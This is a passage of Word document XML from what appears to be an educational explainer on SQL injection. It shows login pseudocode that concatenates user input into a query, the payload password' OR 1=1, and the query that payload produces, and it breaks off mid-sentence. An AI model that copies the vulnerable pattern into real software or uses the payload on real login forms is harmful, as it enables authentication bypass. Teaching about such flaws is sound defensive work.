        <w:t>The following script is pseudocode executed on a web server. It is a simple example of authenticating with a username and a password. The example database has a table named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> with the following columns: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF35A7E" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t># Define POST variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3782D" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>request.POST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>['username']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E863F79" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>request.POST</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>['password']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DD8BB" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B03442" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t># SQL query vulnerable to SQLi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD195E7" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> = “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> username=’” + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> + “’ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve">=’” + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> + “’”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F709528" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D17225B" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8DDC98" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C547D65" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>These input fields are vulnerable to SQL Injection. An attacker could use SQL commands in the input in a way that would alter the SQL statement executed by the database server. For example, they could use a trick involving a single quote and set the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t> field to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B8527" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>password' OR 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420FED81" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>As a result, the database server runs the following SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78173A83" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917A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before="150" w:after="150"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> username=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>'username'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DD1144"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>'password'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-number"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2CACD3" w14:textId="77777777" w:rsidR="000917AA" w:rsidRDefault="000917AA" w:rsidP="000917AA">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="225" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="1D1C29"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>Because of the </w:t>
